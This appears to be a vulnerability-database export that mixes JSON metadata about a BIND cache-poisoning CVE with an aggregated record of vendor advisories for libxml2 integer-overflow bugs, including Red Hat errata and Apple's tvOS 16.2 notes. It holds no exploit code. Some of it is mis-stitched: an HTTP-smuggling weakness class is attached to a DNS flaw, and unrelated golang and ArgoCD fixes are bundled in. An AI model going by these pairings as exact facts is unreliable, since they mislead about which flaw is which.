"last_update_date": "2026-04-10T22:16:12.611000Z",
"patch": {
"_id": null,
"data": [
{
"title": "NV22-009",
"trust": 0.8,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/API7U5E7SX7BAAVFNW366FFJGD6NZZKV/"
},
{
"title": "Ubuntu Security Notice: USN-5332-2: Bind vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5332-2"
},
{
"title": "Red Hat: Moderate: dhcp security and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228385 - Security Advisory"
},
{
"title": "Red Hat: Moderate: bind security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227790 - Security Advisory"
},
{
"title": "Ubuntu Security Notice: USN-5332-1: Bind vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5332-1"
},
{
"title": "Red Hat: Moderate: bind security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228068 - Security Advisory"
},
{
"title": "Red Hat: Moderate: bind security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20230402 - Security Advisory"
},
{
"title": "Debian Security Advisories: DSA-5105-1 bind9 -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=16d84b908a424f50b3236db9219500e3"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-25220"
},
{
"title": "Amazon Linux 2: ALAS2-2023-2001",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2023-2001"
},
{
"title": "Amazon Linux 2022: ALAS2022-2022-166",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-166"
},
{
"title": "Amazon Linux 2022: ALAS2022-2022-138",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-138"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/Live-Hack-CVE/CVE-2021-25220 "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/vincent-deng/veracode-container-security-finding-parser "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-25220"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-001797"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-444",
"trust": 1.0
},
{
"problemtype": "HTTP Request Smuggling (CWE-444) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-001797"
},
{
"db": "NVD",
"id": "CVE-2021-25220"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.8,
"url": "https://kb.isc.org/v1/docs/cve-2021-25220"
},
{
"trust": 1.8,
"url": "https://security.gentoo.org/glsa/202210-25"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20220408-0001/"
},
{
"trust": 1.7,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf"
},
{
"trust": 1.6,
"url": "https://supportportal.juniper.net/s/article/2022-10-security-bulletin-junos-os-srx-series-cache-poisoning-vulnerability-in-bind-used-by-dns-proxy-cve-2021-25220?language=en_us"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-25220"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/security/cve/cve-2021-25220"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2sxt7247qtknbq67mnrgzd23adxu6e5u/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5vx3i2u3icoiei5y7oya6cholfmnh3yq/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/api7u5e7sx7baavfnw366ffjgd6nzzkv/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/de3uavcpumakg27zl5yxsp2c3riow3jz/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/nyd7us4hzrfugaj66zthfbyvp5n3oqby/"
},
{
"trust": 0.9,
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-258-05"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu98927070/index.html"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu99475301/"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu92488108/index.html"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-105-08"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/nyd7us4hzrfugaj66zthfbyvp5n3oqby/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/api7u5e7sx7baavfnw366ffjgd6nzzkv/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5vx3i2u3icoiei5y7oya6cholfmnh3yq/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2sxt7247qtknbq67mnrgzd23adxu6e5u/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/de3uavcpumakg27zl5yxsp2c3riow3jz/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169846/red-hat-security-advisory-2022-8385-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1223"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1289"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/isc-bind-spoofing-via-dns-forwarders-cache-poisoning-37754"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4616"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169894/red-hat-security-advisory-2022-8068-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031728"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166356/ubuntu-security-notice-usn-5332-2.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1150"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1183"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1160"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169773/red-hat-security-advisory-2022-7643-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170724/red-hat-security-advisory-2023-0402-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169587/gentoo-linux-security-advisory-202210-25.html"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2021-25220/"
},
{
"trust": 0.6,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-22-258-05"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5750"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031701"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2694"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022032124"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.5,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.5,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0396"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2795"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.1_release_notes/index"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0396"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.7_release_notes/index"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/444.html"
},
{
"trust": 0.1,
"url": "https://github.com/live-hack-cve/cve-2021-25220"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5332-2"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://alas.aws.amazon.com/al2/alas-2023-2001.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0402"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2795"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8068"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8385"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:7790"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:7643"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-38178"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2906"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2881"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-25219"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3080"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-38177"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5332-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/bind9/1:9.16.1-0ubuntu2.10"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/bind9/1:9.16.15-1ubuntu1.2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/bind9/1:9.11.3+dfsg-1ubuntu1.17"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-25220"
},
{
"db": "PACKETSTORM",
"id": "170724"
},
{
"db": "PACKETSTORM",
"id": "169894"
},
{
"db": "PACKETSTORM",
"id": "169846"
},
{
"db": "PACKETSTORM",
"id": "169745"
},
{
"db": "PACKETSTORM",
"id": "169773"
},
{
"db": "PACKETSTORM",
"id": "169587"
},
{
"db": "PACKETSTORM",
"id": "166354"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-1514"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-001797"
},
{
"db": "NVD",
"id": "CVE-2021-25220"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULMON",
"id": "CVE-2021-25220",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170724",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169894",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169846",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169745",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169773",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169587",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166354",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202203-1514",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-001797",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-25220",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-03-23T00:00:00",
"db": "VULMON",
"id": "CVE-2021-25220",
"ident": null
},
{
"date": "2023-01-25T16:07:50",
"db": "PACKETSTORM",
"id": "170724",
"ident": null
},
{
"date": "2022-11-16T16:09:16",
"db": "PACKETSTORM",
"id": "169894",
"ident": null
},
{
"date": "2022-11-15T16:40:52",
"db": "PACKETSTORM",
"id": "169846",
"ident": null
},
{
"date": "2022-11-08T13:44:36",
"db": "PACKETSTORM",
"id": "169745",
"ident": null
},
{
"date": "2022-11-08T13:49:24",
"db": "PACKETSTORM",
"id": "169773",
"ident": null
},
{
"date": "2022-10-31T14:50:53",
"db": "PACKETSTORM",
"id": "169587",
"ident": null
},
{
"date": "2022-03-17T15:54:20",
"db": "PACKETSTORM",
"id": "166354",
"ident": null
},
{
"date": "2022-03-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-1514",
"ident": null
},
{
"date": "2022-05-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-001797",
"ident": null
},
{
"date": "2022-03-23T13:15:07.680000",
"db": "NVD",
"id": "CVE-2021-25220",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-11-28T00:00:00",
"db": "VULMON",
"id": "CVE-2021-25220",
"ident": null
},
{
"date": "2023-07-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202203-1514",
"ident": null
},
{
"date": "2025-04-17T07:53:00",
"db": "JVNDB",
"id": "JVNDB-2022-001797",
"ident": null
},
{
"date": "2023-11-09T14:44:33.733000",
"db": "NVD",
"id": "CVE-2021-25220",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "166354"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-1514"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "BIND\u00a0 Cache Pollution with Incorrect Records Vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-001797"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "environmental issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202203-1514"
}
],
"trust": 0.6
}
}
VAR-202210-0997
Vulnerability from variot - Updated: 2026-04-10 22:15An issue was discovered in libxml2 before 2.10.3. When parsing a multi-gigabyte XML document with the XML_PARSE_HUGE parser option enabled, several integer counters can overflow. This results in an attempt to access an array at a negative 2GB offset, typically leading to a segmentation fault. It is written in C language and can be called by many languages, such as C language, C++, XSH. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. Summary:
OpenShift API for Data Protection (OADP) 1.1.2 is now available. Description:
OpenShift API for Data Protection (OADP) enables you to back up and restore application resources, persistent volume data, and internal container images to external backup storage. OADP enables both file system-based and snapshot-based backups for persistent volumes. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):
2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers 2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters 2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps 2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests
- JIRA issues fixed (https://issues.jboss.org/):
OADP-1056 - DPA fails validation if multiple BSLs have the same provider OADP-1150 - Handle docker env config changes in the oadp-operator OADP-1217 - update velero + restic to 1.9.5 OADP-1256 - Backup stays in progress status after restic pod is restarted due to OOM killed OADP-1289 - Restore partially fails with error "Secrets \"deployer-token-rrjqx\" not found" OADP-290 - Remove creation/usage of velero-privileged SCC
- Description:
Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications. Bugs fixed (https://bugzilla.redhat.com/):
2160492 - CVE-2023-22482 ArgoCD: JWT audience claim is not verified 2162517 - CVE-2023-22736 argocd: Controller reconciles apps outside configured namespaces when sharding is enabled
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: libxml2 security update Advisory ID: RHSA-2023:0338-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2023:0338 Issue date: 2023-01-23 CVE Names: CVE-2022-40303 CVE-2022-40304 ==================================================================== 1. Summary:
An update for libxml2 is now available for Red Hat Enterprise Linux 9.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64
- Description:
The libxml2 library is a development toolbox providing the implementation of various XML standards.
Security Fix(es):
-
libxml2: integer overflows with XML_PARSE_HUGE (CVE-2022-40303)
-
libxml2: dict corruption caused by entity reference cycles (CVE-2022-40304)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The desktop must be restarted (log out, then log back in) for this update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
2136266 - CVE-2022-40303 libxml2: integer overflows with XML_PARSE_HUGE 2136288 - CVE-2022-40304 libxml2: dict corruption caused by entity reference cycles
- Package List:
Red Hat Enterprise Linux AppStream (v. 9):
aarch64: libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm libxml2-debugsource-2.9.13-3.el9_1.aarch64.rpm libxml2-devel-2.9.13-3.el9_1.aarch64.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm
ppc64le: libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm libxml2-debugsource-2.9.13-3.el9_1.ppc64le.rpm libxml2-devel-2.9.13-3.el9_1.ppc64le.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm
s390x: libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm libxml2-debugsource-2.9.13-3.el9_1.s390x.rpm libxml2-devel-2.9.13-3.el9_1.s390x.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm
x86_64: libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm libxml2-debugsource-2.9.13-3.el9_1.i686.rpm libxml2-debugsource-2.9.13-3.el9_1.x86_64.rpm libxml2-devel-2.9.13-3.el9_1.i686.rpm libxml2-devel-2.9.13-3.el9_1.x86_64.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm
Red Hat Enterprise Linux BaseOS (v. 9):
Source: libxml2-2.9.13-3.el9_1.src.rpm
aarch64: libxml2-2.9.13-3.el9_1.aarch64.rpm libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm libxml2-debugsource-2.9.13-3.el9_1.aarch64.rpm python3-libxml2-2.9.13-3.el9_1.aarch64.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm
ppc64le: libxml2-2.9.13-3.el9_1.ppc64le.rpm libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm libxml2-debugsource-2.9.13-3.el9_1.ppc64le.rpm python3-libxml2-2.9.13-3.el9_1.ppc64le.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm
s390x: libxml2-2.9.13-3.el9_1.s390x.rpm libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm libxml2-debugsource-2.9.13-3.el9_1.s390x.rpm python3-libxml2-2.9.13-3.el9_1.s390x.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm
x86_64: libxml2-2.9.13-3.el9_1.i686.rpm libxml2-2.9.13-3.el9_1.x86_64.rpm libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm libxml2-debugsource-2.9.13-3.el9_1.i686.rpm libxml2-debugsource-2.9.13-3.el9_1.x86_64.rpm python3-libxml2-2.9.13-3.el9_1.x86_64.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm python3-libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2022-40303 https://access.redhat.com/security/cve/CVE-2022-40304 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2023 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2022-12-13-7 tvOS 16.2
tvOS 16.2 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213535.
Accounts Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: A user may be able to view sensitive user information Description: This issue was addressed with improved data protection. CVE-2022-42843: Mickey Jin (@patch1t)
AppleAVD Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Parsing a maliciously crafted video file may lead to kernel code execution Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46694: Andrey Labunets and Nikita Tarakanov
AppleMobileFileIntegrity Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app may be able to bypass Privacy preferences Description: This issue was addressed by enabling hardened runtime. CVE-2022-42865: Wojciech Reguła (@_r3ggi) of SecuRing
AVEVideoEncoder Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app may be able to execute arbitrary code with kernel privileges Description: A logic issue was addressed with improved checks. CVE-2022-42848: ABC Research s.r.o
ImageIO Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Processing a maliciously crafted file may lead to arbitrary code execution Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46693: Mickey Jin (@patch1t)
ImageIO Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Parsing a maliciously crafted TIFF file may lead to disclosure of user information Description: The issue was addressed with improved memory handling. CVE-2022-42851: Mickey Jin (@patch1t)
IOHIDFamily Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved state handling. CVE-2022-42864: Tommy Muir (@Muirey03)
IOMobileFrameBuffer Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds write issue was addressed with improved input validation. CVE-2022-46690: John Aakerblom (@jaakerblom)
Kernel Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with additional validation. CVE-2022-46689: Ian Beer of Google Project Zero
Kernel Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Connecting to a malicious NFS server may lead to arbitrary code execution with kernel privileges Description: The issue was addressed with improved bounds checks. CVE-2022-46701: Felix Poulin-Belanger
Kernel Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: A remote user may be able to cause kernel code execution Description: The issue was addressed with improved memory handling. CVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year Lab
Kernel Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-42845: Adam Doupé of ASU SEFCOM
libxml2 Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: An integer overflow was addressed through improved input validation. CVE-2022-40303: Maddie Stone of Google Project Zero
libxml2 Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution Description: This issue was addressed with improved checks. CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project Zero
Preferences Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app may be able to use arbitrary entitlements Description: A logic issue was addressed with improved state management. CVE-2022-42855: Ivan Fratric of Google Project Zero
Safari Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Visiting a website that frames malicious content may lead to UI spoofing Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. CVE-2022-46695: KirtiKumar Anandrao Ramchandani
Software Update Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: A user may be able to elevate privileges Description: An access issue existed with privileged API calls. This issue was addressed with additional restrictions. CVE-2022-42849: Mickey Jin (@patch1t)
Weather Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: An app may be able to read sensitive location information Description: The issue was addressed with improved handling of caches. CVE-2022-42866: an anonymous researcher
WebKit Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. WebKit Bugzilla: 245521 CVE-2022-42867: Maddie Stone of Google Project Zero
WebKit Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory consumption issue was addressed with improved memory handling. WebKit Bugzilla: 245466 CVE-2022-46691: an anonymous researcher
WebKit Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Processing maliciously crafted web content may bypass Same Origin Policy Description: A logic issue was addressed with improved state management. WebKit Bugzilla: 246783 CVE-2022-46692: KirtiKumar Anandrao Ramchandani
WebKit Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Processing maliciously crafted web content may result in the disclosure of process memory Description: The issue was addressed with improved memory handling. CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day Initiative
WebKit Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved input validation. WebKit Bugzilla: 246942 CVE-2022-46696: Samuel Groß of Google V8 Security WebKit Bugzilla: 247562 CVE-2022-46700: Samuel Groß of Google V8 Security
WebKit Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Processing maliciously crafted web content may disclose sensitive user information Description: A logic issue was addressed with improved checks. CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.
WebKit Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. WebKit Bugzilla: 247420 CVE-2022-46699: Samuel Groß of Google V8 Security WebKit Bugzilla: 244622 CVE-2022-42863: an anonymous researcher
WebKit Available for: Apple TV 4K, Apple TV 4K (2nd generation and later), and Apple TV HD Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1. Description: A type confusion issue was addressed with improved state handling. WebKit Bugzilla: 248266 CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group
Additional recognition
Kernel We would like to acknowledge Zweig of Kunlun Lab for their assistance.
Safari Extensions We would like to acknowledge Oliver Dunk and Christian R. of 1Password for their assistance.
WebKit We would like to acknowledge an anonymous researcher and scarlet for their assistance.
Apple TV will periodically check for software updates. Alternatively, you may manually check for software updates by selecting "Settings -> System -> Software Update -> Update Software." To check the current version of software, select "Settings -> General -> About." All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE-----
